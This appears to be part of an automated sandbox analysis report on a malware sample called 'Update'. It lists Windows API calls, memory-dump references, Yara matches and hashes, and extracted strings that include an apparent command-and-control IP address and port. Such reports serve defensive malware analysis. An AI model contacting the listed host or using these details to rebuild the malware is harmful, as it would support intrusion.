                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFileIos_base_dtorSleepstd::ios_base::_
                                                                                                • String ID: $jIk
                                                                                                • API String ID: 3742752172-1761899760
                                                                                                • Opcode ID: 5deccb82259c4d25e19ca9ee29ffa6de5c0bc22815935c28f4261ed7a8b93688
                                                                                                • Instruction ID: 147b7565d4d8e279a05017edf029c76cfde1f617ccd690dda74e869f0026e7ec
                                                                                                • Opcode Fuzzy Hash: 5deccb82259c4d25e19ca9ee29ffa6de5c0bc22815935c28f4261ed7a8b93688
                                                                                                • Instruction Fuzzy Hash: 5B51F2B1D153988FDB11CF68C9417EDBBB2BF59304F158299D84877252EB706AC9CB80
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 037F316B
                                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 037F3183
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 037F322F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CurrentThread$ExchangeInterlocked
                                                                                                • String ID:
                                                                                                • API String ID: 4033114805-0
                                                                                                • Opcode ID: 3df11d8481d12b97ee5d60339034e1f32f4226a4fff9adf8d5ab99c6dca845bb
                                                                                                • Instruction ID: 93b5f72637de00d8428485713afa91176b1c9e5b88bec6f2096895473c1d0a22
                                                                                                • Opcode Fuzzy Hash: 3df11d8481d12b97ee5d60339034e1f32f4226a4fff9adf8d5ab99c6dca845bb
                                                                                                • Instruction Fuzzy Hash: 1931BF78200A02DFEB18EF69C884A66B3E9FF44714B10C56DEA1ACB718D731F841CB90
                                                                                                APIs
                                                                                                • __floor_pentium4.LIBCMT ref: 037F11E9
                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 037F1226
                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 037F1255
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                • String ID:
                                                                                                • API String ID: 2605973128-0
                                                                                                • Opcode ID: 9e131ded19b06ac7891e92e9c44d53ba28c3be619220bf06103aaa81488ed718
                                                                                                • Instruction ID: f1350320c26b1b5718d12ced491dd01297160a4b2170b14c5610f701ca08702b
                                                                                                • Opcode Fuzzy Hash: 9e131ded19b06ac7891e92e9c44d53ba28c3be619220bf06103aaa81488ed718
                                                                                                • Instruction Fuzzy Hash: E8219D71B00709AFDB14EFAED845B6EFBF8FF40B05F4085A9E959E2740EA30A8108744
                                                                                                APIs
                                                                                                • __floor_pentium4.LIBCMT ref: 100011E9
                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 10001226
                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 10001255
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                • String ID:
                                                                                                • API String ID: 2605973128-0
                                                                                                • Opcode ID: 7c8a02711727f2d10f68a554ded2e2394815aae473f82a087a4a6f69535250f3
                                                                                                • Instruction ID: 68b1d39f7c788df30121c4cd9fa650265093b70568a06a1b8131812e88253602
                                                                                                • Opcode Fuzzy Hash: 7c8a02711727f2d10f68a554ded2e2394815aae473f82a087a4a6f69535250f3
                                                                                                • Instruction Fuzzy Hash: EB21D170A00709AFEB14DFA9DC85B9EFBF4FF44745F00C5ADE949E2644EA30A8108790
                                                                                                APIs
                                                                                                • __floor_pentium4.LIBCMT ref: 037F112F
                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 037F115F
                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 037F1192
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                • String ID:
                                                                                                • API String ID: 2605973128-0
                                                                                                • Opcode ID: 2267aee34ec9df8429baaaf62407a6a709266480570681be556dc84c0d1bba5e
                                                                                                • Instruction ID: 7100dc537ca4d90c40b4b4be45f7a61ce153bc4886ae599d104044725b5b74bf
                                                                                                • Opcode Fuzzy Hash: 2267aee34ec9df8429baaaf62407a6a709266480570681be556dc84c0d1bba5e
                                                                                                • Instruction Fuzzy Hash: 9C119070A00708EFDB10AFA9DC86B6EFBF8FF04705F4085A9EA59E2340E770A9108754
                                                                                                APIs
                                                                                                • __floor_pentium4.LIBCMT ref: 1000112F
                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 1000115F
                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 10001192
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                • String ID:
                                                                                                • API String ID: 2605973128-0
                                                                                                • Opcode ID: 9a9a6dbc4d50d479c69aa6d6b662a424f68bc22565965440325d2e32c173b15c
                                                                                                • Instruction ID: ccfbffdb8cfccccbf267e057733e19453fb850e329b77576dd89ff791b5dae30
                                                                                                • Opcode Fuzzy Hash: 9a9a6dbc4d50d479c69aa6d6b662a424f68bc22565965440325d2e32c173b15c
                                                                                                • Instruction Fuzzy Hash: 77119670A00709ABEB14DFA9DC86B9EF7F4FF04745F008569EE59D2240E671A9148750
                                                                                                APIs
                                                                                                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 037F9E04
                                                                                                • GdipDisposeImage.GDIPLUS(?), ref: 037F9E18
                                                                                                • GdipDisposeImage.GDIPLUS(?), ref: 037F9E3B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                                                                                • String ID:
                                                                                                • API String ID: 800915452-0
                                                                                                • Opcode ID: 01d4784f96e4544a53a1c4970ebe67b820e7306fd23e9de6fc9a3e6224015d8f
                                                                                                • Instruction ID: 40cda12532f2791031dc66dd3096c79a4d35b75b0a5dfa8c1fd96efbfd6a475b
                                                                                                • Opcode Fuzzy Hash: 01d4784f96e4544a53a1c4970ebe67b820e7306fd23e9de6fc9a3e6224015d8f
                                                                                                • Instruction Fuzzy Hash: 05F0A472900219ABCB10EF94D8448AFF77CFB45615B00458AFE05AB340D7308B15CBD0
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(0381FB64), ref: 037F9ADC
                                                                                                • GdiplusStartup.GDIPLUS(0381FB60,?,?), ref: 037F9B15
                                                                                                • LeaveCriticalSection.KERNEL32(0381FB64), ref: 037F9B26
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                                                                                • String ID:
                                                                                                • API String ID: 389129658-0
                                                                                                • Opcode ID: dd9ee6342b95c09c129d7a59fa0ac5f0d1371bb9d42b5a69919f5ead023d156b
                                                                                                • Instruction ID: de827799dfa620d3b945eea5acc70aabd0e78af9878034498d425180ec16c205
                                                                                                • Opcode Fuzzy Hash: dd9ee6342b95c09c129d7a59fa0ac5f0d1371bb9d42b5a69919f5ead023d156b
                                                                                                • Instruction Fuzzy Hash: FFF067719812099FDB10EFE1E86A7EFBBBCF705315F4002D9EB0892241D7BA0158CBA1
                                                                                                APIs
                                                                                                • DeleteFileW.KERNEL32(6CAA51D8,?,6CAA51D8,?,?,?,0000000F), ref: 6CAB3586
                                                                                                • GetLastError.KERNEL32(?,6CAA51D8,?,?,?,0000000F), ref: 6CAB3590
                                                                                                • __dosmaperr.LIBCMT ref: 6CAB3597
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: DeleteErrorFileLast__dosmaperr
                                                                                                • String ID:
                                                                                                • API String ID: 1545401867-0
                                                                                                • Opcode ID: 6cad80d4d3e9cb1ac850ac10445ca5edbbde057d6fdd61676c72cbc198e4bd80
                                                                                                • Instruction ID: c550ab68f23f98741881b66b3b89c8d980054c943dc531876e428a37641d8c0d
                                                                                                • Opcode Fuzzy Hash: 6cad80d4d3e9cb1ac850ac10445ca5edbbde057d6fdd61676c72cbc198e4bd80
                                                                                                • Instruction Fuzzy Hash: CBD0C9722092096B8E081AF6AD0C91A3BAC9B863793184765F52DC6590EE32C9A29650
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID: 137.220.229.61$9091
                                                                                                • API String ID: 3472027048-3822757443
                                                                                                • Opcode ID: 4513ec0b7f0e3245ec74d41a3833d4d9c4567df1cbadf7205a2421670dd53040
                                                                                                • Instruction ID: d4922cd372dd7236031f7b79510b5f56ce2b8beeb54c8bf7640301d5853f9da9
                                                                                                • Opcode Fuzzy Hash: 4513ec0b7f0e3245ec74d41a3833d4d9c4567df1cbadf7205a2421670dd53040
                                                                                                • Instruction Fuzzy Hash: C9D023F0604871CBE928C500DC5447A7375F7C42513940105FC479B144CB74FC08D550
                                                                                                APIs
                                                                                                • __getptd_noexit.LIBCMT ref: 1000715B
                                                                                                  • Part of subcall function 10009896: GetLastError.KERNEL32(00000001,00000000,10007112,10006F0C,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 1000989A
                                                                                                  • Part of subcall function 10009896: ___set_flsgetvalue.LIBCMT ref: 100098A8
                                                                                                  • Part of subcall function 10009896: __calloc_crt.LIBCMT ref: 100098BC
                                                                                                  • Part of subcall function 10009896: DecodePointer.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 100098D6
                                                                                                  • Part of subcall function 10009896: GetCurrentThreadId.KERNEL32 ref: 100098EC
                                                                                                  • Part of subcall function 10009896: SetLastError.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 10009904
                                                                                                • __freeptd.LIBCMT ref: 10007165
                                                                                                  • Part of subcall function 10009A58: TlsGetValue.KERNEL32(?,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009A79
                                                                                                  • Part of subcall function 10009A58: TlsGetValue.KERNEL32(?,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009A8B
                                                                                                  • Part of subcall function 10009A58: DecodePointer.KERNEL32(00000000,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009AA1
                                                                                                  • Part of subcall function 10009A58: __freefls@4.LIBCMT ref: 10009AAC
                                                                                                  • Part of subcall function 10009A58: TlsSetValue.KERNEL32(0000001F,00000000,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009ABE
                                                                                                • ExitThread.KERNEL32 ref: 1000716E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                • String ID:
                                                                                                • API String ID: 4224061863-0
                                                                                                • Opcode ID: 13d03437f215ed93d40a7d70e196fa756bd6aa96be3d41e5933ba2785ed1d9c5
                                                                                                • Instruction ID: 88b9861ec1dd8ad2b25034eab61c1c94f8d4b81d5381debfb6d8fd2c6c03db1f
                                                                                                • Opcode Fuzzy Hash: 13d03437f215ed93d40a7d70e196fa756bd6aa96be3d41e5933ba2785ed1d9c5
                                                                                                • Instruction Fuzzy Hash: 79C02B3050060C7BFB00A776CC0E95F3A8DDF811C1F668010F80CC5159EE38FC008291
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: DeleteFile
                                                                                                • String ID: '
                                                                                                • API String ID: 4033686569-1997036262
                                                                                                • Opcode ID: e6891a2af0921ce2b8b695b68244b525be374e52c3ce6aec3c1c4da91092cda0
                                                                                                • Instruction ID: 3feec628a0fcd26a781dab50c530706a68a991104f6dfe63cf6678aa254c27ca
                                                                                                • Opcode Fuzzy Hash: e6891a2af0921ce2b8b695b68244b525be374e52c3ce6aec3c1c4da91092cda0
                                                                                                • Instruction Fuzzy Hash: 69C11B72D210244BDB2CCA2DCD957EDB6E3AF81314F1A4768E429A7BD4CB319EC48791
                                                                                                APIs
                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 6CA9685B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Startup
                                                                                                • String ID: 137.220.229.61
                                                                                                • API String ID: 724789610-1785040285
                                                                                                • Opcode ID: 370bc67378d6b29588125cc77d8c97ecc501be36059a3895407c3dfe2b120f75
                                                                                                • Instruction ID: a9048469e1e583cd9bb2410bfb01dddc7d2235469ff92a73c1630753a93eba0b
                                                                                                • Opcode Fuzzy Hash: 370bc67378d6b29588125cc77d8c97ecc501be36059a3895407c3dfe2b120f75
                                                                                                • Instruction Fuzzy Hash: 32E03071418341AAE2009B11C908B9BBAE8AFDA30CF015A0DB4D855141D7B456988B57
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0367022B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510627044.0000000003670000.00000040.00001000.00020000.00000000.sdmp, Offset: 03670000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_3670000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                • Instruction ID: ec8fe833f857748ef63b1c724ef1af27e018b277fc5c62c0b1205fbcc5150ce2
                                                                                                • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                • Instruction Fuzzy Hash: 41A18E71A00606EFCB14CFA9C980AAEF7B5FF08314F5881A9E415DB351E730EA51CBA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 61873d4593c08b8ffda0515f68e9c6f13dbd868172b919d50191516ca31ea2ca
                                                                                                • Instruction ID: 8258fbdceac960246e5b44d751f5c759063fbf9b79dd9c871e3fd64243eacb0d
                                                                                                • Opcode Fuzzy Hash: 61873d4593c08b8ffda0515f68e9c6f13dbd868172b919d50191516ca31ea2ca
                                                                                                • Instruction Fuzzy Hash: 1B91FF71A117448FDB04CF28C981BAABBF6FF89314F148659E81A9B791D730E985CB90
                                                                                                APIs
                                                                                                  • Part of subcall function 6CAB15C6: GetConsoleOutputCP.KERNEL32(9AFB9AC3,00000000,00000000,?), ref: 6CAB1629
                                                                                                • WriteFile.KERNEL32(?,6CAB07FB,00000000,6CABB0A5,00000000,6CAB07FB,00000000,00000000,?,6CABB0A5,00000000,00000000,6CABAFE2,6CAB07FB,00000000,?), ref: 6CAB13A1
                                                                                                • GetLastError.KERNEL32(?,6CABB0A5,00000000,00000000,6CABAFE2,6CAB07FB,00000000,?,6CABA281,00000000,6CAB07FB), ref: 6CAB13AB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                • String ID:
                                                                                                • API String ID: 2915228174-0
                                                                                                • Opcode ID: d9b02396e68770f99aad16410270901f9d325ffa4d9be933cd249a898e3f94c1
                                                                                                • Instruction ID: fb9c8e236f3acd8848e9f01352dfc8bc1700f759c94fa0b47de7f180b4c79f92
                                                                                                • Opcode Fuzzy Hash: d9b02396e68770f99aad16410270901f9d325ffa4d9be933cd249a898e3f94c1
                                                                                                • Instruction Fuzzy Hash: B761A571D14219AFDF05CFA8C984AFEBBBDAF4A308F180155EA10B7645D332D986CB90
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: __fread_nolock
                                                                                                • String ID:
                                                                                                • API String ID: 2638373210-0
                                                                                                • Opcode ID: bb58a6a0a802cbbd7d4787d1b2aa3885e63c8cef58e2f1b244c96a4b348c1e1e
                                                                                                • Instruction ID: 808b79c33958c645fd203495f7e60aea9e3a5c3dfb91475dd6939c802865f6d0
                                                                                                • Opcode Fuzzy Hash: bb58a6a0a802cbbd7d4787d1b2aa3885e63c8cef58e2f1b244c96a4b348c1e1e
                                                                                                • Instruction Fuzzy Hash: 955108327092148FC7148E6DC980B1AB3E6AF88718F1A866DF899CB7D0D775DC85CB91
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Time_memmovetime
                                                                                                • String ID:
                                                                                                • API String ID: 1463837790-0
                                                                                                • Opcode ID: aa203b2cbda9aec0713802ee616a91a989bc0421ef3b69a448573314bddc25cc
                                                                                                • Instruction ID: 7472951ecdc6142c721ad3348498c8fe017ad8d952fa801f9fd3c423b9f36496
                                                                                                • Opcode Fuzzy Hash: aa203b2cbda9aec0713802ee616a91a989bc0421ef3b69a448573314bddc25cc
                                                                                                • Instruction Fuzzy Hash: A5519F767006029FE316CF69C8C0A9BB7A9FF48294715C669E919CB709DB31FC51CB90
                                                                                                APIs
                                                                                                  • Part of subcall function 6CAA3EF1: GetSystemTimeAsFileTime.KERNEL32(6CA81A64,?,?,?,?,?,6CA81A64,00000000), ref: 6CAA3F06
                                                                                                  • Part of subcall function 6CAA3EF1: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAA3F25
                                                                                                • Sleep.KERNEL32(00000064), ref: 6CA81B6C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                • String ID: gfff
                                                                                                • API String ID: 2563648476-1553575800
                                                                                                • Opcode ID: 5e10c2fe8ab8b40cc77d7b1d5eed57a5c485481a60edf490af1a6a2817f8b3fd
                                                                                                • Instruction ID: c06dfea95e352534c1ae84e560425e5a501fce11cba7b6759f21968b5e203f68
                                                                                                • Opcode Fuzzy Hash: 5e10c2fe8ab8b40cc77d7b1d5eed57a5c485481a60edf490af1a6a2817f8b3fd
                                                                                                • Instruction Fuzzy Hash: 8851E2B1E012088FDB04CBE9D9087FDBBB4EB05718F088229D125E7B90E77595C9CB92
                                                                                                APIs
